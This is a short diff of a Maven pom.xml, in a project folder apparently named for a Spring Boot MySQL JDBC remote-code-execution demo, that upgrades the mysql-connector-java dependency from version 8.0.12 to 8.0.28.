b/repository/springboot-mysql-jdbc-rce/pom.xml @@ -22,7 +22,7 @@ mysql mysql-connector-java - 8.0.12 + 8.0.28

AltStyle によって変換されたページ (->オリジナル) /